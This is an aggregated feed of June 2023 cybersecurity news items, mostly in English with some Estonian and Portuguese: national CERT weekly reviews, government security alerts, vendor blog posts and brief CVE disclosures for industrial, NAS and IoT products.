2023-06-21T08:31:29Z | 1687336289

Riigi Infosüsteemi Ameti (RIA) tellimusel koostasid Cybernetica teadlased värske ülevaate krüptograafiliste vahendite kasutamise hetkeseisust.

https://ria.ee/uudised/ria-avaldas-uuendatud-kruptoalgoritmide-uuringu
The National Cyber Security Centre Finland’s weekly review – 24/2023
2023-06-20T10:20:04Z | 1687256404

This week we talk about ransomware development trends and remind our readers not to forget about cyber security during the summer holiday season. Ransomware attacks are being increasingly targeted at backup copies, and in addition to encrypting data, attackers also extort users by threatening to publish their data.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-242023
The National Cyber Security Centre Finland’s weekly review – 24/2023
2023-06-20T10:20:04Z | 1687256404

This week we talk about ransomware development trends and remind our readers not to forget about cyber security during the summer holiday season. Ransomware attacks are being increasingly targeted at backup copies, and in addition to encrypting data, attackers also extort users by threatening to publish their data.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-242023
Seis milhões de euros para a criação de 7 Centros de Competências em Cibersegurança
2023-06-20T00:00:00Z | 1687219200

O lançamento do aviso de abertura do concurso para a apresentação de candidaturas para a instalação de Centro de Competências em Cibersegurança (CCC), com dotação de aproximadamente seis milhões de euros (5.925.612,00 euros), surge no âmbito do projeto PRR C-Network. Este aviso, que prevê a instalação de sete CCCs,- um por cada região tipo NUTII -, possibilita a apresentação de candidaturas por consórcios formados entre entidades da administração pública regional ou local, entidades do Ensino Superior, públicas ou privadas, e associações do tecido de inovação e empresarial. . A operação tem como meta, até março de 2026, apoiar 2001 entidades. O presente aviso visa dar integral cumprimento do princípio da transparência e prestação de contas, que determina a aplicação à gestão dos fundos europeus das boas práticas de informação pública dos apoios a conceder e concedidos de avaliação dos resultados obtidos. Mais informação sobre esta candidatura aqui

https://dyn.cncs.gov.pt/pt/detalhe/art/135782/seis-milhoes-de-euros-para-a-criacao-de-7-centros-de-competencias-em-ciberseguranca
The TAG Heuer Porsche Formula E Team & Cato Networks: The Story Behind the Partnership
2023-06-19T07:52:23Z | 1687161143

The post The TAG Heuer Porsche Formula E Team & Cato Networks: The Story Behind the Partnership appeared first on Cato Networks.

https://go.catonetworks.com/rs/245-RJK-441/images/partnership_cato_Porsche.pdf
Security Alert (A23-06-13): Multiple Vulnerabilities in Microsoft Edge
2023-06-19T04:00:00Z | 1687147200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-14): Vulnerability in Fortinet Products
2023-06-19T04:00:00Z | 1687147200

Fortinet released a security advisory to address a vulnerability in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-15): Multiple Vulnerabilities in Synology DiskStation Manager
2023-06-19T04:00:00Z | 1687147200

Synology has published security advisories to address multiple vulnerabilities in various versions of DiskStation Manager (DSM).

https://www.govcert.gov.hk/en/alerts_detail.php
Trail of Bits’s Response to NTIA AI Accountability RFC
2023-06-16T12:00:10Z | 1686916810

The National Telecommunications and Information Administration (NTIA) has circulated an Artificial Intelligence (AI) Accountability Policy Request for Comment on what policies can support the development of AI audits, assessments, certifications, and other mechanisms to create earned trust in AI systems. Trail of Bits has submitted a response to the […]

https://blog.trailofbits.com/2023/06/16/trail-of-bitss-response-to-ntia-ai-accountability-rfc/
Finding bugs in C code with Multi-Level IR and VAST
2023-06-15T11:00:10Z | 1686826810

Intermediate languages (IRs) are what reverse engineers and vulnerability researchers use to see the forest for the trees. IRs are used to view programs at different abstraction layers, so that analysis can understand both low-level code aberrations and higher levels of flawed logic mistakes. The setback is that bug-finding tools are often pigeonholed into choosing […]

https://blog.trailofbits.com/2023/06/15/finding-bugs-with-mlir-and-vast/
RIA kutsub rohkem ettevõtteid toetust küsima
2023-06-15T08:41:22Z | 1686818482

Märtsist avas Riigi Infosüsteemi Amet (RIA) koos EASi ja KredExi ühendasutusega toetuste taotlemise programmi, et aidata tõsta ettevõtete küberturvalisuse taset. Juunist laienes ettevõtete ring, kes saavad küsida kuni 60 000 euro suurust toetust. Nende hulgas on perearstikeskused, elektrienergia tootjad, majutus- ja toitlustusettevõtted ja paljud teised.

https://ria.ee/uudised/ria-kutsub-rohkem-ettevotteid-toetust-kusima
Security Alert (A23-06-12): Multiple Vulnerabilities in Apache Struts
2023-06-15T04:00:00Z | 1686801600

The Apache Software Foundation has released the security bulletins to address the vulnerabilities in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
How I choose a security research topic
2023-06-14T13:09:35Z | 1686748175

How do you choose what topic to research? That’s the single most common question I get asked, probably because selecting a topic is such a daunting prospect. In this post, I’ll take a personal look at

https://portswigger.net/research/how-i-choose-a-security-research-topic
Script Security: Achieving PCI DSS v4 Compliance Before the Deadline
2023-06-14T13:00:00Z | 1686747600

The new Akamai Page Integrity Manager capabilities are purpose-built to address the latest PCI DSS v4.0 script requirements with one comprehensive tool.

https://www.akamai.com/blog/security/script-security-achieving-pci-dss-v4-compliance-before-deadline
Connecting anything to make everything possible: Cisco Live 2023
2023-06-14T12:00:00Z | 1686744000

Cisco Live 2023 is in the books! Watch this video for a full recap of the event.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m06/connecting-anything-to-make-everything-possible-cisco-live-2023.html
Hackers think in all directions. End-to-end security is the answer.
2023-06-14T12:00:00Z | 1686744000

Cisco Security Cloud explained by Tom Gillis, SVP and General Manager, Security Business Group.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m06/hackers-think-in-all-directions-end-to-end-security-is-the-answer.html
IoT has an identity problem. Here’s how to solve it
2023-06-14T08:18:57Z | 1686730737

Successfully Identifying operating systems in organizations has become a crucial part of network security and asset management products. With this information, IT and security departments can gain greater visibility and control over their network. When a software agent is installed on a host, this task becomes trivial. However, several OS types, mainly for embedded and... The post IoT has an identity problem. Here’s how to solve it appeared first on Cato Networks.

https://www.catonetworks.com/blog/iot-has-an-identity-problem-heres-how-to-solve-it/
High Threat Security Alert (A23-06-08): Multiple Vulnerabilities in Microsoft Products (June 2023)
2023-06-14T04:00:00Z | 1686715200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-09) Multiple Vulnerabilities in Google Chrome
2023-06-14T04:00:00Z | 1686715200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-10): Multiple Vulnerabilities in Citrix Products
2023-06-14T04:00:00Z | 1686715200

Citrix released security advisories to address multiple vulnerabilities in Citrix products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-11): Vulnerability in VMware Tools
2023-06-14T04:00:00Z | 1686715200

VMware has published a security advisory to address a vulnerability in VMware Tools.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-2639
2023-06-13T14:18:00Z | 1686665880

CWE 346: Origin Validation Error Origin validation errors could lead to information disclosure. The underlying feedback mechanism of FactoryTalk System Services that transfers the FactoryTalk Policy Manager rules to relevant devices on the network does not verify that the origin of the communication is from a legitimate local client device. This could allow a threat actor to craft a malicious website that, when visited, would send a malicious script to connect to the local WebSocket endpoint and wait for events as if it was a valid client device. If successfully exploited, this could allow a threat actor to receive information, including whether FactoryTalk Policy Manager is installed or the entire security policy. User interaction is required for successful vulnerability exploitation.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2639
CVE-2023-2638
2023-06-13T14:17:00Z | 1686665820

CWE 287: Improper Authentication Improper authorization in FTSSBackupRestore.exe could lead to the loading of malicious configuration archives. FactoryTalk System Services does not verify that backup configuration archives are password protected. This vulnerability could allow a local authenticated non-admin user to craft a malicious backup archive without password protection to be loaded by FactoryTalk System Services as a valid backup when a restore procedure takes place. This vulnerability requires user interaction for successful exploitation.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2638
CVE-2023-2637
2023-06-13T14:15:00Z | 1686665700

CWE 321: Use of Hard-Coded Cryptographic Keys Hard-coded cryptographic key vulnerabilities could lead to privilege escalation. FactoryTalk System Services uses a hard-coded cryptographic key to generate administrator cookies. This vulnerability could allow a local authenticated non-admin user to generate an invalid administrator cookie giving them administrative privileges to the FactoryTalk Policy Manger database. The threat actor could make malicious changes to the database to be deployed when a legitimate FactoryTalk Policy Manager user deploys a security policy model. User interaction is required to successfully exploit this vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2637
The National Cyber Security Centre Finland’s weekly review – 23/2023
2023-06-13T13:34:39Z | 1686663279

In this second weekly review for June, we have some unfortunate news to share about phone number spoofing, compromised online games and breached firewalls. Luckily there are good things happening as well: the National Bureau of Investigation and the Southwestern Finland Police Department have completed their preliminary investigation of a major online banking fraud case.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-232023
The National Cyber Security Centre Finland’s weekly review – 23/2023
2023-06-13T13:34:39Z | 1686663279

In this second weekly review for June, we have some unfortunate news to share about phone number spoofing, compromised online games and breached firewalls. Luckily there are good things happening as well: the National Bureau of Investigation and the Southwestern Finland Police Department have completed their preliminary investigation of a major online banking fraud case.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-232023
Preparation for the post-quantum cryptography age underway in Finland as well
2023-06-13T13:25:07Z | 1686662707

In 1994, American mathematician Peter Shor devised an algorithm for quantum computers that can effectively factor large integers. The development of quantum computers is currently proceeding at a rapid pace, and once a sufficiently powerful quantum computer is built, Shor's algorithm could be used to break contemporary public-key cryptography schemes, which are essential for the secure operation of the internet, among other things.

https://www.kyberturvallisuuskeskus.fi/en/news/preparation-post-quantum-cryptography-age-underway-finland-well
Preparation for the post-quantum cryptography age underway in Finland as well
2023-06-13T13:25:07Z | 1686662707

In 1994, American mathematician Peter Shor devised an algorithm for quantum computers that can effectively factor large integers. The development of quantum computers is currently proceeding at a rapid pace, and once a sufficiently powerful quantum computer is built, Shor's algorithm could be used to break contemporary public-key cryptography schemes, which are essential for the secure operation of the internet, among other things.

https://www.kyberturvallisuuskeskus.fi/en/news/preparation-post-quantum-cryptography-age-underway-finland-well
Entering Through the Gift Shop: Attacks on Commerce
2023-06-13T13:00:00Z | 1686661200

https://www.akamai.com/blog/security-research/entering-the-gift-shop-attacks-on-commerce
CVE-2023-2729
2023-06-13T11:18:00Z | 1686655080

Use of insufficiently random values vulnerability in User Management Functionality in Synology DiskStation Manager (DSM) before 7.2-64561 allows remote attackers to obtain user credential via unspecified vectors.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2729
Akamai?s Perspective on June?s Patch Tuesday 2023
2023-06-13T09:00:00Z | 1686646800

Every Patch Tuesday stirs up the community. See Akamai's insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-june-2023
High Threat Security Alert (A23-06-07): Multiple Vulnerabilities in Fortinet Products
2023-06-13T04:00:00Z | 1686628800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Office Excel FreePhisxdb arbitrary free vulnerability
2023-06-13T00:00:00Z | 1686614400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1730
Microsoft Office Excel WebCharts out-of-bounds write vulnerability
2023-06-13T00:00:00Z | 1686614400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1734
Olukord küberruumis – mai 2023
2023-06-12T12:26:30Z | 1686572790

Mais registreerisime 329 mõjuga intsidenti, mis on viimase poole aasta kõige kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-mai-2023
CVE-2022-29841
2023-06-12T09:15:00Z | 1686561300

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Western Digital MyCloud PR4100 NAS devices. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the do_reboot binary. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2022-29841
Cato Protects Against MOVEit vulnerability (CVE-2023-34362)
2023-06-12T07:33:41Z | 1686555221

A new critical vulnerability (CVE-2023-34362) has been published by Progress Software in its file transfer application, MOVEit Transfer. A SQL Injection vulnerability was discovered in MOVEit enabling unauthenticated access to MOVEit’s Transfer database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information... The post Cato Protects Against MOVEit vulnerability (CVE-2023-34362) appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-protects-against-moveit-vulnerability-cve-2023-34362/
7 Compelling Reasons Why Analysts Recommend SASE
2023-06-11T09:47:57Z | 1686476877

The post 7 Compelling Reasons Why Analysts Recommend SASE appeared first on Cato Networks.

https://www.catonetworks.com/resources/7-compelling-reasons-why-analysts-recommend-sase/
Simplicity at Speed: How Cato’s SASE Drives the TAG Heuer Porsche Formula E Team’s Racing
2023-06-11T07:56:43Z | 1686470203

The post Simplicity at Speed: How Cato’s SASE Drives the TAG Heuer Porsche Formula E Team’s Racing appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-simplicity-at-speed
Future Growth Relies on Channel Partners
2023-06-09T13:00:00Z | 1686315600

https://www.akamai.com/blog/partners/2023/jun/future-growth-relies-on-channel-partners
Impact of OpenSSL Possible DoS translating ASN 1 object identifiers on SonicWall Products CVE-2023-2650
2023-06-08T21:40:24Z | 1686260424

Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow.Impact summary: Applications that use OBJ_obj2txt() directly, or use any of the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message size limit may experience notable to very long delays when processing those messages, which may lead to a Denial of Service.For more information on the OpenSSL CVE-2023-2650, available here https://www.openssl.org/news/secadv/20230530.txtSonicWall is investigating its product line to determine which products and cloud services may be affected by this vulnerability and the Affected and Fixed Products(s) can change as more information becomes available. CVE: CVE-2023-2650 Last updated: June 8, 2023, 9:40 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009
Deploying Harper and Akamai Cloud for Faster API Performance
2023-06-08T13:00:00Z | 1686229200

https://www.akamai.com/blog/cloud/deploy-harperdb-akamai-connected-cloud-faster-api-performance
FIRST appoints new chair as organization continues to grow globally
2023-06-08T13:00:00Z | 1686229200

FIRST’s AGM took place during the 35th Annual Conference in Montréal, Canada at the start of June 2023. Senior cybersecurity expert Tracy Bills, CERT/CC was elected to lead FIRST’s Board of Directors with the organization’s leadership team further strengthened with the appointment of Carlos Alvarez from ICANN to the Board.

https://www.first.org/newsroom/releases/20230608
FIRST appoints new chair as organization continues to grow globally
2023-06-08T13:00:00Z | 1686229200

FIRST’s AGM took place during the 35th Annual Conference in Montréal, Canada at the start of June 2023. Senior cybersecurity expert Tracy Bills, CERT/CC was elected to lead FIRST’s Board of Directors with the organization’s leadership team further strengthened with the appointment of Carlos Alvarez from ICANN to the Board.

https://www.first.org/newsroom/releases/20230608
Üle aasta uuendamata ID-tarkvaraga ei saa 13. juunist enam riigi e-teenustesse sisse logida
2023-06-08T12:19:49Z | 1686226789

ID-kaardi kasutajad, kes ei ole üle aasta ID-tarkvara uuendanud, peaksid seda tegema enne 13. juunit, mil Riigi Infosüsteemi Amet (RIA) läheb riigi autentimisteenuses täielikult üle uuele ID-kaardiga veebis autentimise ja allkirjastamise lahendusele Web eID.

https://ria.ee/uudised/ule-aasta-uuendamata-id-tarkvaraga-ei-saa-13-juunist-enam-riigi-e-teenustesse-sisse-logida
CVE-2022-36328
2023-06-08T09:14:00Z | 1686215640

This vulnerability allows remote attackers to create and read arbitrary files on affected installations of Western Digital MyCloud PR4100 NAS devices. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the restsdk binary. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2022-36328
CVE-2022-36331
2023-06-08T09:07:00Z | 1686215220

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Western Digital MyCloud PR4100 NAS devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the generation of TLS certificates. The issue results from the inclusion of sensitive information in publicly accessible channels. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2022-36331
CVE-2022-36327
2023-06-08T09:01:00Z | 1686214860

CWE-288 Path Traversal: A path traversal vulnerability that could allow an attacker to write files to locations with certain critical filesystem types leading to remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2022-36327
MOVEit SQLi Zero-Day (CVE-2023-34362) Exploited by CL0P Ransomware Group
2023-06-08T09:00:00Z | 1686214800

Akamai Security Intelligence Group, which has been examining the MOVEit vulnerability and its exploitation, provides recommendations for detection and mitigation.

https://www.akamai.com/blog/security-research/moveit-sqli-zero-day-exploit-clop-ransomware
High Threat Security Alert (A23-06-05): Multiple Vulnerabilities in VMware Aria Operations for Networks
2023-06-08T04:00:00Z | 1686196800

VMware has published a security advisory to address multiple vulnerabilities in VMware Aria Operations for Networks.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-06-06): Multiple Vulnerabilities in Cisco Products
2023-06-08T04:00:00Z | 1686196800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Analyzing Broken User Authentication Threats to JSON Web Tokens
2023-06-07T14:00:00Z | 1686146400

https://www.akamai.com/blog/security-research/owasp-authentication-threats-for-json-web-token
The National Cyber Security Centre Finland’s weekly review – 22/2023
2023-06-07T10:19:44Z | 1686133184

This week we talk about phishing attacks that involve scammers impersonating banks and malware spread via email. We also provide a refresher on what to take into account when a child receives their first smart device.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-222023
The National Cyber Security Centre Finland’s weekly review – 22/2023
2023-06-07T10:19:44Z | 1686133184

This week we talk about phishing attacks that involve scammers impersonating banks and malware spread via email. We also provide a refresher on what to take into account when a child receives their first smart device.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-222023
High Threat Security Alert (A23-06-02): Multiple Vulnerabilities in Microsoft Edge
2023-06-07T04:00:00Z | 1686110400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-03): Multiple Vulnerabilities in Firefox
2023-06-07T04:00:00Z | 1686110400

Mozilla has published the advisories (MFSA2023-19 and MFSA2023-20) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-06-04): Multiple Vulnerabilities in Android
2023-06-07T04:00:00Z | 1686110400

Google has released Android Security Bulletin June 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Cisco Showcases Vision to Simplify Networking and Securely Connect the World
2023-06-06T15:30:00Z | 1686065400

Cisco is on a mission to simplify IT, today announcing its vision for Cisco Networking Cloud, an integrated management platform experience for both on-prem and cloud operating models. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m06/cisco-showcases-vision-to-simplify-networking-and-securely-connect-the-world.html
Unified Experiences: How Cisco Networking Cloud is Simplifying IT
2023-06-06T15:30:00Z | 1686065400

The company’s vision for Cisco Networking Cloud is to make everything easier to manage and deliver by converging its platforms over time, ultimately arriving at a unified network management platform that works both on premises and in the cloud, for improved visibility and cloud-driven automation.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m06/all-aboard-for-unified-experiences-how-cisco-networking-cloud-is-simplifying-it.html
NCSC statement on MOVEit Transfer vulnerability
2023-06-06T09:52:30Z | 1686045150

An NCSC statement following reports of a vulnerability in MOVEit Transfer.

https://www.ncsc.gov.uk/news/moveit-transfer-vulnerability
High Threat Security Alert (A23-06-01): Vulnerability in Google Chrome
2023-06-06T04:00:00Z | 1686024000

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Lançado o Boletim nº 2/2023 do Observatório de Cibersegurança
2023-06-06T00:00:00Z | 1686009600

O Boletim nº2/2023 do Observatório de Cibersegurança do CNCS aborda a emergência de novos grupos de hacktivistas que se posicionam de um dos lados do conflito ligado à guerra na Ucrânia. Estes grupos, fruto deste novo contexto, têm características diversas do hacktivismo tradicional. Como sempre, este Boletim partilha ainda documentos e notícias considerados de interesse para a comunidade. Aceda ao documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135780/lancado-o-boletim-n-22023-do-observatorio-de-ciberseguranca
CVE-2023-33371
2023-06-06T00:00:00Z | 1686009600

Control ID IDSecure 4.7.26.0 and prior uses a hardcoded cryptographic key in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33371
CVE-2023-33370
2023-06-06T00:00:00Z | 1686009600

An uncaught exception vulnerability exists in Control ID IDSecure 4.7.26.0 and prior, allowing attackers to cause the main web server of IDSecure to fault and crash, causing a denial of service.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33370
CVE-2023-33369
2023-06-06T00:00:00Z | 1686009600

A path traversal vulnerability exists in Control ID IDSecure 4.7.26.0 and prior, allowing attackers to delete arbitrary files on IDSecure filesystem, causing a denial of service.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33369
CVE-2023-33368
2023-06-06T00:00:00Z | 1686009600

Some API routes exists in Control ID IDSecure 4.7.26.0 and prior, exfiltrating sensitive information and passwords to users accessing these API routes.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33368
CVE-2023-33366
2023-06-06T00:00:00Z | 1686009600

A SQL injection vulnerability exists in Suprema BioStar 2 before 2.9.1, which allows authenticated users to inject arbitrary SQL directives into an SQL statement and execute arbitrary SQL commands.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33366
CVE-2023-33365
2023-06-06T00:00:00Z | 1686009600

A path traversal vulnerability exists in Suprema BioStar 2 before 2.9.1, which allows unauthenticated attackers to fetch arbitrary files from the server's web server.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33365
CVE-2023-33364
2023-06-06T00:00:00Z | 1686009600

An OS Command injection vulnerability exists in Suprema BioStar 2 before V2.9.1, which allows authenticated users to execute arbitrary OScommands on the BioStar 2 server.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33364
CVE-2023-33363
2023-06-06T00:00:00Z | 1686009600

An authentication bypass vulnerability exists in Suprema BioStar 2 before 2.9.1, which allows unauthenticated users to access some functionality on BioStar 2 servers.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33363
CVE-2023-33379
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has a misconfiguration in their MQTT broker used for management and device communication, which allows devices to connect to the broker and issue commands to other device, impersonating Connected IO management platform and sending commands to all of ConnectedIO's devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33379
CVE-2023-33378
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has an argument injection vulnerability in its AT command message in its communication protocol, enabling attackers to execute arbitrary OS commands on devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33378
CVE-2023-33377
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has an OS command injection vulnerability in the set firewall command in part of its communication protocol, enabling attackers to execute arbitrary OS commands on devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33377
CVE-2023-33376
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has an argument injection vulnerability in its ip tables command message in its communication protocol, enabling attackers to execute arbitrary OS commands on devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33376
CVE-2023-33375
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has a stack-based buffer overflow vulnerability in its communication protocol, enabling attackers to take control over devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33375
CVE-2023-33374
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior has a command as part of its communication protocol allowing the management platform to specify arbitrary OS commands for devices to execute. Attackers abusing this dangerous functionality may issue all devices OS commands to execute, resulting in arbitrary remote command execution.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33374
CVE-2023-33373
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior keeps passwords and credentials in clear-text format, allowing attackers to exfiltrate the credentials and use them to impersonate the devices.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33373
CVE-2023-33372
2023-06-06T00:00:00Z | 1686009600

ConnectedIO v2.1.0 and prior uses a hard-coded username/password pair embedded in their device's firmware used for device communication using MQTT. An attacker who gained access to these credentials is able to connect to the MQTT broker and send messages on behalf of devices, impersonating them. in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33372
CVE-2023-33367
2023-06-06T00:00:00Z | 1686009600

A SQL injection vulnerability exists in Control ID IDSecure 4.7.26.0 and prior, allowing unauthenticated attackers to write PHP files on the server's root directory, resulting in remote code execution.

https://claroty.com/team82/disclosure-dashboard/cve-2023-33367
Bypassing CSP via DOM clobbering
2023-06-05T14:00:00Z | 1685973600

You might have found HTML injection, but unfortunately identified that the site is protected with CSP. All is not lost, it might be possible to bypass CSP using DOM clobbering, which you can now detec

https://portswigger.net/research/bypassing-csp-via-dom-clobbering
5 Best Practices for Implementing Secure and Effective SD-WAN
2023-06-05T07:27:16Z | 1685950036

Corporate networks are rapidly becoming more complex and distributed. With the growth of cloud computing, remote work, mobile and Internet of Things (IoT), companies have users and IT assets everywhere, requiring connectivity. Software-defined WAN (SD-WAN) provides the ability to implement a secure, high-performance corporate WAN on top of existing networks. However, SD-WAN infrastructures must be... The post 5 Best Practices for Implementing Secure and Effective SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-best-practices-for-secure-and-effective-implementation/
Kybermittari (Cybermeter) helps to perceive cybersecurity risks
2023-06-02T13:00:22Z | 1685710822

We have developed a new version of the Kybermittari tool on the basis of feedback from users. The new version of Kybermittari as well as new support material are available on the NCSC-FI website. Register for Kybermittari presentation and training events to be held in the summer and autumn!

https://www.kyberturvallisuuskeskus.fi/en/news/kybermittari-cybermeter-helps-perceive-cybersecurity-risks
Kybermittari (Cybermeter) helps to perceive cybersecurity risks
2023-06-02T13:00:22Z | 1685710822

We have developed a new version of the Kybermittari tool on the basis of feedback from users. The new version of Kybermittari as well as new support material are available on the NCSC-FI website. Register for Kybermittari presentation and training events to be held in the summer and autumn!

https://www.kyberturvallisuuskeskus.fi/en/news/kybermittari-cybermeter-helps-perceive-cybersecurity-risks
Predicting the volume of CVEs with Vuln4Cast
2023-06-02T00:01:00Z | 1685664060

National CERT and CSIRT teams regularly need to write alerts on upcoming CVEs, and might want to know how many alerts to expect to write.

https://www.first.org/blog/20230602-Predicting_the_volume_of_CVEs_with_Vuln4Cast
CVE-2023-32172
2023-06-02T00:00:00Z | 1685664000

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Unified Automation UaGateway. Authentication is required to exploit this vulnerability. The specific flaw exists within the implementation of the ImportXML function. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.

https://claroty.com/team82/disclosure-dashboard/cve-2023-32172
RIA toetab kahe aasta jooksul Tehnopoli küberkiirendi kaudu idufirmasid 720 000 euroga
2023-06-01T10:29:56Z | 1685615396

Tehnopol Startup Inkubaator ühes Riigi Infosüsteemi Ameti (RIA) ja Euroopa küberpädevuskeskusega (ECCC) korraldavad küberkiirendit, kuhu järgmised kaks aastat on oodatud kandideerima küberturvalisuse valdkonna iduettevõtted. Kiirendisse pääsenud tiimid saavad oma idee arendamiseks tipptasemel nõu ja 48 000 eurot.

https://ria.ee/uudised/ria-toetab-kahe-aasta-jooksul-tehnopoli-kuberkiirendi-kaudu-idufirmasid-720-000-euroga
New Magecart-Style Campaign Abusing Legitimate Websites to Attack Others
2023-06-01T05:00:00Z | 1685595600

https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
Inside Look: Adobe Incident Response Team Players - Lauren Park, Director, Security Coordination Center at Adobe
2023-06-01T00:01:00Z | 1685577660

Adobe has long focused on establishing a strong foundation of cybersecurity, built on a culture of collaboration, multiple capabilities, and deep engineering prowess. We aim to take a proactive approach to defending against security threats and issues and continuously monitor the threat landscape, learn from, and share our learnings with security experts around the world, and feed information back to our development teams to strengthen our products.

https://www.first.org/blog/20230601-Inside_Look_Adobe_Incident_Response_Team_Players
Deliver Fast, Reliable, and Secure Web Experiences with HTTP/3
2023-05-31T13:00:00Z | 1685538000

https://www.akamai.com/blog/performance/deliver-fast-reliable-secure-web-experiences-http3
CERT-EE hoiatab SMS õngitsuste eest
2023-05-31T08:51:47Z | 1685523107

RIA intsidentide lahendamise osakonna (CERT-EE) eksperdid on tuvastanud viimastel nädalatel iga päev suurusjärgus kümmekond uut õngitsuslehte, mille kaudu petavad kelmid inimestelt pangakaardi andmeid ja PIN-koode. RIA-le teadaolevalt on inimesed jäänud ilma tuhandetest eurodest.

https://ria.ee/uudised/cert-ee-hoiatab-sms-ongitsuste-eest
